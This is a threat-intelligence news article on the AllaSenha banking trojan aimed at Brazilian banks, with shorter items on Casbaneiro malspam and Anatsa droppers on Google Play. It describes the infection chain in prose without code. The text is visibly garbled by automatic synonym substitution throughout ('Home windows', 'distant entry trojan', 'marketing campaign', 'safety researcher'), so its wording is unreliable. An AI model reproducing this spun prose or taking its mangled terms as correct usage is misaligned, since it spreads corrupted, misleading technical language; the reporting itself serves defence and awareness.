Brazilian banking establishments are the goal of a brand new marketing campaign that distributes a customized variant of the Home windows-based AllaKore distant entry trojan (RAT) known as AllaSenha.
The malware is “specifically aimed at stealing credentials that are required to access Brazilian bank accounts, [and] leverages Azure cloud as command-and-control (C2) infrastructure,” French cybersecurity firm HarfangLab stated in a technical evaluation.
Targets of the marketing campaign embrace banks comparable to Banco do Brasil, Bradesco, Banco Safra, Caixa Econômica Federal, Itaú Unibanco, Sicoob, and Sicredi. The preliminary entry vector, although not definitively confirmed, factors in direction of using malicious hyperlinks in phishing messages.
The start line of the assault is a malicious Home windows shortcut (LNK) file that masquerades as a PDF doc (“NotaFiscal.pdf.lnk”) hosted on a WebDAV server since no less than March 2024. There may be additionally proof to recommend that the risk actors behind the exercise beforehand abused legit companies like Autodesk A360 Drive and GitHub to host the payloads.
The LNK file, when launched, executes a Home windows command shell that is designed to open a decoy PDF file to the recipient, whereas concurrently retrieving a BAT payload named “c.cmd” from the identical WebDAV server location.
Dubbed the BPyCode launcher, the file launches a Base64-encoded PowerShell command, which subsequently downloads the Python binary from the official www.python[.]org web site with a purpose to execute a Python script codenamed BPyCode.
BPyCode, for its half, features as a downloader for a dynamic-link library (“executor.dll”) and operating it in reminiscence. The DLL is fetched from one of many domains generated through a website technology algorithm (DGA).
“Generated hostnames seem to match those that are associated with the Microsoft Azure Functions service, a serverless infrastructure that in this case would allow operators to easily deploy and rotate their staging infrastructure,” the corporate stated.
Particularly, BPyCode retrieves a pickle file that features three information: A second Python loader script, a ZIP archive containing the PythonMemoryModule package deal, and one other ZIP archive containing “executor.dll.”
The brand new Python loader script is then launched to load executor.dll, a Borland Delphi-based malware additionally known as ExecutorLoader, in reminiscence utilizing PythonMemoryModule. ExecutorLoader is primarily tasked with decoding and executing AllaSenha by injecting it right into a legit mshta.exe course of.
Along with stealing on-line banking account credentials from internet browsers, AllaSenha comes with the power to show overlay home windows with a purpose to seize two-factor authentication (2FA) codes and even trick a sufferer into scanning a QR code to approve a fraudulent transaction initiated by the attackers.
“All AllaSenha samples […] use Access_PC_Client_dll.dll as their original file name,” HarfangLab famous. “This identify can notably be discovered within the KL Gorki mission, a banking malware which appears to mix elements of each AllaKore and ServerSocket.”
Additional evaluation of the supply code related to the preliminary LNK file and AllaSenha samples has revealed {that a} Portuguese-speaking person named bert1m is probably going linked to the event of the malware, though there is no such thing as a proof at this stage to recommend that they’re working the instruments as nicely.
“The threat actors that operate in Latin America appear to be a particularly productive source of cybercrime campaigns,” HarfangLab stated.
“While almost exclusively targeting Latin American individuals to steal banking details, these actors often end up compromising computers that are indeed operated by subsidiaries or employees in Brazil, but that belong to companies all around the world.”
The event comes as Forcepoint detailed malspam campaigns distributing one other Latin America-focused banking trojan known as Casbaneiro (aka Metamorfo and Ponteiro) through HTML attachments with an goal to siphon victims’ monetary data.
“The malware distributed via email urges the user to click on the attachment,” safety researcher Prashant Kumar stated. “The attachment contains malicious code which does a series of activities and leads to data compromise.”
Anatsa Android Banking Trojan Sneaks into Google Play Retailer
It is not simply Home windows that has been on the receiving finish of banking trojan assaults, for Zscaler ThreatLabz disclosed particulars of an Android banking malware marketing campaign that made use of decoy functions uploaded to the Google Play retailer to ship Anatsa (aka TeaBot and Toddler).
These clear dropper functions go off as seemingly innocent productiveness and utility apps like PDF readers, QR code readers, and translators, and make use of an similar an infection chain revealed by ThreatFabric earlier this February to retrieve and deploy the malware from a distant server beneath the guise of an app replace to evade detection.
The apps, which have since been taken down by Google, are listed under –
- com.appandutilitytools.fileqrutility (QR Reader & File Supervisor)
- com.ultimatefilesviewer.filemanagerwithpdfsupport (PDF Reader & File Supervisor)
In accordance with statistics out there on Sensor Tower, PDF Reader & File Supervisor has been put in anyplace between 500 to 1,000 occasions, whereas the QR code reader app has had installations within the vary of fifty,000 to 100,000.
“Once installed, Anatsa exfiltrates sensitive banking credentials and financial information from global financial applications,” researchers Himanshu Sharma and Gajanan Khond stated. “It achieves this through the use of overlay and accessibility techniques, allowing it to intercept and collect data discreetly.”
Zscaler stated it recognized over 90 malicious apps on the Play Retailer over the previous few months which have collectively had greater than 5.5 million installations and had been used to propagate varied malware households like Joker, Facestealer, Anatsa, Coper, and different adware.
